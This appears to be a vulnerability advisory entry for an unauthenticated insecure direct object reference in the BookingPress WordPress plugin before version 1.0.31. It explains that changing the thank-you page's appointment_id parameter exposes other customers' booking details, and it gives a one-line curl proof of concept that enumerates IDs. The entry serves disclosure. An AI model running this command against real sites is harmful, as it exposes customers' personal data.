Lucene search

K
wpvulndbHussien MisbahWPVDB-ID:8A7BD9F6-2789-474B-A237-01C643FDFBA7
HistoryDec 07, 2022 - 12:00 a.m.

BookingPress < 1.0.31 - Unauthenticated IDOR in appointment_id

2022-12-0700:00:00
Hussien Misbah
wpscan.com
13
bookingpress plugin
unauthenticated
idor
vulnerability
appointment_id
insecure direct object reference
thank you page
query parameter
information disclosure
poc
curl
base64
host
service
datetime
customer
software.

EPSS

0.001

Percentile

40.5%

The plugin suffers from an Insecure Direct Object Reference (IDOR) vulnerability in it’s thank you page, allowing any visitor to display information about any booking, including full name, date, time and service booked, by manipulating the appointment_id query parameter.

PoC

curl -s “http://host/thank-you/?appointment_id=$(echo 2 | base64 )” | grep “(service|datetime|customer)” changing the number reveals the customer name tied to this appointment if there is no result then this appointment is not reversed yet.

EPSS

0.001

Percentile

40.5%

Related for WPVDB-ID:8A7BD9F6-2789-474B-A237-01C643FDFBA7